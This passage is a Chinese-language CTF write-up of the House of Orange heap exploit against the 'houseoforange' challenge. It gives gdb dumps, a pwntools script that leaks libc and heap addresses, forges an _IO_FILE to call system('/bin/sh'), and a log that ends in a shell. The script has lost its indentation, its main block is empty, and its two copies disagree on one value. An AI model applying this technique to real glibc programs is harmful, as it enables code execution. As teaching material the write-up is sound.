gdb-peda$ x/32gx 0x555555758010-0x10
0x555555758000: 0x0000000000000000 0x0000000000000021
0x555555758010: 0x0000555555758050 0x0000555555758030
0x555555758020: 0x0000000000000000 0x0000000000000021
0x555555758030: 0x4141414141414141 0x4141414141414141
0x555555758040: 0x4141414141414141 0x4141414141414141
0x555555758050: 0x0000001f00000001 0x4141414141414141
0x555555758060: 0x0000000000000000 0x0000000000000021
0x555555758070: 0x0000555555758090 0x0000555555779010
0x555555758080: 0x0000000000000000 0x0000000000000021
0x555555758090: 0x0000001f00000001 0x0000000000000000
0x5555557580a0: 0x0000000000000000 0x0000000000000021 <-- house 3
0x5555557580b0: 0x00005555557584e0 0x00005555557580d0
0x5555557580c0: 0x0000000000000000 0x0000000000000411 <-- name 3
0x5555557580d0: 0x4141414141414141 0x0a41414141414141
0x5555557580e0: 0x00005555557580c0 0x00005555557580c0
0x5555557580f0: 0x0000000000000000 0x0000000000000000
### house of orange
def house_of_orange():
io_list_all = libc_base + libc.symbols['_IO_list_all']
system_addr = libc_base + libc.symbols['system']
vtable_addr = heap_addr + 0x5c8
log.info("_IO_list_all address: 0x%x" % io_list_all)
log.info("system address: 0x%x" % system_addr)
log.info("vtable address: 0x%x" % vtable_addr)
stream = "/bin/sh\x00" + p64(0x60) # fake header # fp
stream += p64(0) + p64(io_list_all - 0x10) # fake bk pointer
stream = stream.ljust(0xa0, '\x00')
stream += p64(heap_addr + 0x5b8) # fp->_wide_data
stream = stream.ljust(0xc0, '\x00')
stream += p64(1) # fp->_mode
payload = "A" * 0x420
payload += stream
payload += p64(0) * 2
payload += p64(vtable_addr) # _IO_FILE_plus->vtable
payload += p64(1) # fp->_wide_data->_IO_write_base
payload += p64(2) # fp->_wide_data->_IO_write_ptr
payload += p64(system_addr) # vtable __overflow
upgrade(0x600, payload)
现在我们有了 libc 和 heap 地址,接下来就是真正的 house-of-orange,相信你已经看了参考章节,这里就不再重复了。结果如下:
gdb-peda$ x/36gx 0x5555557580c0+0x410
0x5555557584d0: 0x4141414141414141 0x4141414141414141
0x5555557584e0: 0x0000001f00000001 0x4141414141414141
0x5555557584f0: 0x0068732f6e69622f 0x0000000000000060 <-- _IO_FILE_plus
0x555555758500: 0x0000000000000000 0x00007ffff7dd2510
0x555555758510: 0x0000000000000000 0x0000000000000000
0x555555758520: 0x0000000000000000 0x0000000000000000
0x555555758530: 0x0000000000000000 0x0000000000000000
0x555555758540: 0x0000000000000000 0x0000000000000000
0x555555758550: 0x0000000000000000 0x0000000000000000
0x555555758560: 0x0000000000000000 0x0000000000000000
0x555555758570: 0x0000000000000000 0x0000000000000000
0x555555758580: 0x0000000000000000 0x0000000000000000
0x555555758590: 0x00005555557585b8 0x0000000000000000
0x5555557585a0: 0x0000000000000000 0x0000000000000000
0x5555557585b0: 0x0000000000000001 0x0000000000000000
0x5555557585c0: 0x0000000000000000 0x00005555557585c8 <-- vtable
0x5555557585d0: 0x0000000000000001 0x0000000000000002
0x5555557585e0: 0x00007ffff7a53380 0x000000000000000a
可以看到 old top chunk 的 size 被改写为 0x60,在下次分配时,会先从 unsorted bin 中取下 old top chunk,将其放到 smallbins[5],同时,unsorted bin 的 bk 也将被改写成了 `&IO_list_all-0x10`。
### pwn
def pwn():
io.sendlineafter("Your choice : ", '1') # abort routine
由于不能够通过检查,将触发异常处理过程,`malloc_printerr -> __libc_message -> __GI_abort -> _IO_flush_all_lockp`。
开启 ASLR,Bingo!!!
$ python exp.py
[+] Starting local process './houseoforange': pid 6219
[*] libc_base address: 0x7f02ae6d9000
[*] heap address: 0x5575b74a2000
[*] _IO_list_all address: 0x7f02aea9d520
[*] system address: 0x7f02ae71e380
[*] vtable address: 0x5575b74a25c8
[*] Switching to interactive mode
*** Error in `./houseoforange': malloc(): memory corruption: 0x00007f02aea9d520 ***
======= Backtrace: =========
$ whoami
### exploit
完整的 exp 如下:
#!/usr/bin/env python
from pwn import *
#context.log_level = 'debug'
io = process(['./houseoforange'], env={'LD_PRELOAD':'./libc-2.23.so'})
libc = ELF('libc-2.23.so')
def build(size, name):
io.sendlineafter("Your choice : ", '1')
io.sendlineafter("Length of name :", str(size))
io.sendlineafter("Name :", name)
io.sendlineafter("Price of Orange:", '1')
io.sendlineafter("Color of Orange:", '1')
def see():
io.sendlineafter("Your choice : ", '2')
data = io.recvuntil('\nPrice', drop=True)[-6:].ljust(8, '\x00')
return data
def upgrade(size, name):
io.sendlineafter("Your choice : ", '3')
io.sendlineafter("Length of name :", str(size))
io.sendlineafter("Name:", name)
io.sendlineafter("Price of Orange:", '1')
io.sendlineafter("Color of Orange:", '1')
def overwrite_top():
build(0x10, 'AAAA')
payload = "A" * 0x30
payload += p64(0) + p64(0xfa1) # top chunk header
upgrade(0x41, payload)
def leak_libc():
global libc_base
build(0x1000, 'AAAA') # _int_free in sysmalloc
build(0x400, 'A' * 7) # large chunk
libc_base = u64(see()) - 0x3c4188 # fd pointer
log.info("libc_base address: 0x%x" % libc_base)
def leak_heap():
global heap_addr
upgrade(0x10, 'A' * 15)
heap_addr = u64(see()) - 0xc0 # fd_nextsize pointer
log.info("heap address: 0x%x" % heap_addr)
def house_of_orange():
io_list_all = libc_base + libc.symbols['_IO_list_all']
system_addr = libc_base + libc.symbols['system']
vtable_addr = heap_addr + 0x5c8
log.info("_IO_list_all address: 0x%x" % io_list_all)
log.info("system address: 0x%x" % system_addr)
log.info("vtable address: 0x%x" % vtable_addr)
stream = "/bin/sh\x00" + p64(0x61) # fake header # fp
stream += p64(0) + p64(io_list_all - 0x10) # fake bk pointer
stream = stream.ljust(0xa0, '\x00')
stream += p64(heap_addr + 0x5b8) # fp->_wide_data
stream = stream.ljust(0xc0, '\x00')
stream += p64(1) # fp->_mode
payload = "A" * 0x420
payload += stream
payload += p64(0) * 2
payload += p64(vtable_addr) # _IO_FILE_plus->vtable
payload += p64(1) # fp->_wide_data->_IO_write_base
payload += p64(2) # fp->_wide_data->_IO_write_ptr
payload += p64(system_addr) # vtable __overflow
upgrade(0x600, payload)
def pwn():
io.sendlineafter("Your choice : ", '1') # abort routine
if __name__ == '__main__':
## 参考资料
- <https://ctftime.org/task/4811>